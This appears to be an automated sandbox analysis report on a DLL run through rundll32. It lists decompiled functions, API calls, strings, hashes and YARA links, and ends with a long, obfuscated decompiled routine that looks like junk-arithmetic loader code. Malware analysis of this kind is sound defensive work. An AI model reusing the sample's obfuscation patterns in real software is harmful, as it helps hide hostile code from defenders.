Opcode Fuzzy Hash: bace20ca603ba7d7d34818d865acf45928c7b2182a547dc031d87b540739d7f8
Instruction Fuzzy Hash: E6018671945226DFDB01CB99C840EAE7F75AF547A5F22011AE65ABB384CB704E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D49C229, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D49C230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D49C265

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

numpunct.LIBCPMT ref: 6D49C276

Part of subcall function 6D49BD9F: __EH_prolog3.LIBCMT ref: 6D49BDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D49C287

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 43107446db13a6eb2c185f5186f4b265224bccef59ac438ca11605a20a2488a3
Instruction ID: 2d58a2bca7c369a1232319f182ae57f34d5b3e4e6f9e182745e2222a25bf3ac6
Opcode Fuzzy Hash: 43107446db13a6eb2c185f5186f4b265224bccef59ac438ca11605a20a2488a3
Instruction Fuzzy Hash: 650169B1945216DADB00DBA58880EAEBFB4AF54785F26011AE655AB284CB708E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D48B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6D48B96F

Part of subcall function 6D48A2F1: __EH_prolog3.LIBCMT ref: 6D48A2F8
Part of subcall function 6D48A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6D48A302
Part of subcall function 6D48A2F1: int.LIBCPMT ref: 6D48A319
Part of subcall function 6D48A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A373

_Find_unchecked1.LIBCPMT ref: 6D48BB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6D48B9D7

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 07fbadcd12975efb63b7fdd4047617b6f7c8fb948c0a7bbf43cef6b61c66faf0
Instruction ID: b4048103f1037e305d4078d5fc8b993427c738bd8d8b8315bbc9ba4004d2ad30
Opcode Fuzzy Hash: 07fbadcd12975efb63b7fdd4047617b6f7c8fb948c0a7bbf43cef6b61c66faf0
Instruction Fuzzy Hash: 7CC16A30E092898FDF12DAA8C490FEDBBB2AF46384F24449DC8956B347CB60DD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C60ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4C617D

Strings

pow, xrefs: 6D4C6155, 6D4C6172

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 745f6252630327e852f83b101fa7fb0a86f597da1940878ca4e6b089bc0d5d9b
Instruction ID: e82551c12410f96ab62f874a41ed0df894900d697346a383d5401327f8db37ef
Opcode Fuzzy Hash: 745f6252630327e852f83b101fa7fb0a86f597da1940878ca4e6b089bc0d5d9b
Instruction Fuzzy Hash: D1513565E1D10396DB41BB18C960B7A6BB4EB41742F30CD58E0D2823B9EF648C91CAC7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D4DDE50,?,00000050,?,?,?,?,?), ref: 6D4DDC8A

Strings

OCP, xrefs: 6D4DDC03
ACP, xrefs: 6D4DDBCD

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: d55663382e8ffb2a093fbecb17494f80993ee5d375c174dc2797d58bec4a8831
Instruction ID: 99535655bb7719abe08a38ebaafcc9c5b9e3b678d617408a2a5f39da70783701
Opcode Fuzzy Hash: d55663382e8ffb2a093fbecb17494f80993ee5d375c174dc2797d58bec4a8831
Instruction Fuzzy Hash: 2421F732A54306A6E7A4CF68C950F97736AABC5F65F628424E909D7304E772DD018F90

Uniqueness

Uniqueness Score: -1.00%

Function 6D49FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

`nTm, xrefs: 6D49FB65
TnTm, xrefs: 6D49FB44

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: TnTm$`nTm
API String ID: 0-3487332901
Opcode ID: 62e374ab9638bee965c5ef6f1d07fc7794671a0c6456998c19670cd54d7981d0
Instruction ID: df8c7190e2aa9be9e8ed552d927957bc4a23c042278cf872f3853cad4a17573b
Opcode Fuzzy Hash: 62e374ab9638bee965c5ef6f1d07fc7794671a0c6456998c19670cd54d7981d0
Instruction Fuzzy Hash: 3A11C176C06715AACF01DEAA8400BDF7BE55B02328F25805AEA10EF680D7B18D458BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4859F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 6D485A52

Strings

:BHm, xrefs: 6D485A35
[json.exception., xrefs: 6D4859FC

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate
String ID: :BHm$[json.exception.
API String ID: 1075933841-1843382348
Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction ID: 51db2556010404d0d9e780f905768e175234eb674d0bf2a4a03e0a6c27aa6330
Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction Fuzzy Hash: BD0161B26082116F8318DF58D8C0C1BB7EDEB9A294711466DFA6AC7246EB31ED05C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D483751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6D483758
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4837E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6D4837BA

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: eeb13f83dfdacb4ab95cbfc0b6b0282fd593f1ccfc59d4e9750cd4e0ce1cccaa
Instruction ID: 6c5b6a0e410e4f06587b21a6f7e1cf9dcb8a2275f138da4a986c6dc33cd7411f
Opcode Fuzzy Hash: eeb13f83dfdacb4ab95cbfc0b6b0282fd593f1ccfc59d4e9750cd4e0ce1cccaa
Instruction Fuzzy Hash: E9016DB1C6C245ABEB01DF64C449FADB2E4AF263E6F25C51E9180D2046DB78CD86C792

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D4B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,D7A19FD1,D7A19FD1,00000000,00000000,00000000,00000000,00000000), ref: 6D4D4C0F
GetLastError.KERNEL32 ref: 6D4D4C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6D4D4C78

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 673ad19ea6e6b01e131d4a73b554ebbe1a51f690d90bb935ddbc8d3cb0c759bc
Instruction ID: 1b6f1bec72e5e2ac0ad2a31e9687a3c0026e587f04c68e364f66258a554262cb
Opcode Fuzzy Hash: 673ad19ea6e6b01e131d4a73b554ebbe1a51f690d90bb935ddbc8d3cb0c759bc
Instruction Fuzzy Hash: 7841F835604207AFDB51CF64C894F7A7BB4EF0ABA0F228169E95D97290DB318D01CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7052 Parent PID: 6996 rundll32.exeCOMMON

Executed Functions

Function 6D481285, Relevance: 39.1, APIs: 3, Strings: 19, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D481285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6D4A00AC(0x6d4e7e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6d545a90; // 0x43cef7fd
				_t127 =  *0x6d5459d0; // 0x43d0c569
				_t261 =  *0x6d5459d8; // 0x914ee6d4
				_t380 =  *0x6d5459dc; // 0x3
				_t358 =  *0x6d545a00; // 0x13aeb46e
				_t405 = 0 - _t380;
				_t327 =  *0x6d545a90; // 0x43cef7fd
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6d545a58 =  *0x6d545a58 + 0xfffffd1c;
					 *0x6d545a00 = _t358;
					asm("adc dword [0x6d545a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6d5459d8 = _t261;
					asm("adc esi, eax");
					 *0x6d5459dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6d5459e6 & 0x0000ffff;
				_t131 = 0x6d5459e6;
				 *(_t400 - 0x2c) = 0x6d5459e6;
				 *(_t400 - 0x1c) = 0x6d5459e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6D4A01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6d5459d8 = _t261;
						 *0x6d5459dc = _t380;
						 *0x6d545a90 = _t327;
						if(_t327 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6d545a44);
				_t135 = 6;
				_t411 =  *0x6d545a98 - _t135; // 0x6d4ee664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6d5459d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6d5459dc = _t380;
				} else {
					_t412 =  *0x6d545a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6d5459d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6d545a00; // 0x13aeb46e
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6d5459e6;
				 *0x6d545a90 = _t139 -  *0x6d545a90 +  *0x6d5459d0;
				_t142 =  *0x6d5459e6 & 0x0000ffff;
				 *0x6d5459d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6d5459dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6D4A01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6d5459d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6d5459dc = _t256;
						 *0x6d545a90 = _t381;
						if(_t381 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t381 =  *0x6d545a00; // 0x13aeb46e
							_t142 =  *0x6d5459e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6d545a44);
				 *0x6d5459d0 = E6D480D32();
				GetTempPathA(0x56d, "C:\Users\jones\AppData\Local\Temp\");
				_t417 =  *0x6d545a04 - 0x1b47; // 0x94
				if(_t417 == 0) {
					_t318 =  *0x6d545a90; // 0x43cef7fd
					_t319 = _t318 + ( *0x6d5459e6 & 0x0000ffff);
					 *0x6d545a90 = _t319;
					_push(0);
					_t320 =  *0x6d5459d8; // 0x914ee6d4
					asm("adc [0x6d5459dc], eax");
					 *0x6d5459d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6D480D32();
				_t402 = _t401 - 0x10;
				 *0x6d5459d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6D485DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6D484197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6D481E10(_t149);
				_t270 = 6;
				_t418 =  *0x6d545a02 - _t270; // 0x13ae
				if(_t418 == 0) {
					_t151 =  *0x6d5459d8; // 0x914ee6d4
					_t153 = _t151 + 0x11dde +  *0x6d5459d0;
					__eflags = _t153;
					 *0x6d545a90 = _t153;
				} else {
					_t315 =  *0x6d5459d8; // 0x914ee6d4
					 *0x6d5459d0 =  *0x6d5459d0 +  ~_t315 -  *0x6d545a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6D4C179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6d5459d0; // 0x43d0c569
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x43d0c231
				_t272 = _t25;
				 *0x6d545a90 = _t272;
				_t419 =  *0x6d545a02 - _t155; // 0x13ae
				if(_t419 == 0) {
					_t331 =  *0x6d545a00; // 0x13aeb46e
					_t156 = 0;
					 *0x6d5459dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6d5459d8 = _t333;
				} else {
					_t333 =  *0x6d5459d8; // 0x914ee6d4
					_t156 =  *0x6d5459dc; // 0x3
					 *0x6d545a90 = _t272 - _t333 * 0x3d -  *0x6d545a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6D484401(_t260, E6D484401(_t260, E6D481FF2(_t260, E6D4820D9(_t260, E6D484267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6d548150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6d545a00; // 0x13aeb46e
				_t277 = 0x6d545a0e;
				_t362 =  *0x6d5459dc; // 0x3
				_t383 =  *0x6d5459d8; // 0x914ee6d4
				do {
					if(_t336 != ( *0x6d5459e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x13aeb473
						_t245 = _t26 + _t383;
						 *0x6d545a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6d5459e2);
				_push("cd Matter m");
				 *0x6d5459d8 = _t383;
				 *0x6d5459dc = _t362; // executed
				E6D4C179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6d545a98 - _t164; // 0x6d4ee664
				if(_t422 != 0) {
					L34:
					 *0x6d5459d8 =  *0x6d5459d8 - 0x27 +  *0x6d5459d0 * 0x3d;
					asm("sbb [0x6d5459dc], ecx");
				} else {
					_t423 =  *0x6d545a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6d5459d8; // 0x914ee6d4
						 *0x6d5459d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6d545a90 =  *0x6d545a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6D484197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6D481E10(_t169);
				_t281 = 0x27;
				_t171 = E6D480EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6d5459d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6d5459dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6D485DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6D484197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6D481E10(_t174);
				_t176 =  *0x6d5459dc; // 0x3
				 *(_t400 - 0x18) =  *0x6d5459d8 * 0x36 +  *0x6d545a90;
				_t286 =  *0x6d545a90 * 0x10e1d;
				_t178 =  *0x6d5459d8; // 0x914ee6d4
				_t287 = 0x6d545a28;
				 *0x6d5459d8 = _t178 * _t286;
				_t340 =  *0x6d545a90; // 0x43cef7fd
				_t180 =  *0x6d5459d0; // 0x43d0c569
				 *0x6d5459dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6d545a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6d5459dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6d5459d8 = _t184;
						_t427 = _t184 -  *0x6d545a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6d545a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6d545a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6D480D32();
				_t364 =  *0x6d545a90; // 0x43cef7fd
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6d5459dc; // 0x3
				_t188 =  *0x6d5459d8; // 0x914ee6d4
				_t190 =  *0x6d5459f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6d5459e6; // 0xe145
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6d5459e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6d5459e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6D4A01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6d545a90 = _t364;
						if(_t364 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6d545a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6d545a98 - _t197; // 0x6d4ee664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6d545a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6d5459e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6d545a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6d545a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6d5459d8 = _t297;
				 *0x6d5459dc = _t346;
				do {
					if(_t393 != ( *0x6d5459e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0x13ad9695
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6d545a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0x13ad96cb
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6d5459d8 = _t297;
						 *0x6d5459dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6d5459e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6d5459e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6d5459e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6d545a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6d5459e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6d545a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6d5459d0 = _t105 + _t347;
				_t213 = E6D481029(_t394);
				_t300 =  *0x6d545a90; // 0x43cef7fd
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6d545a00 = _t213;
				_t348 = _t300;
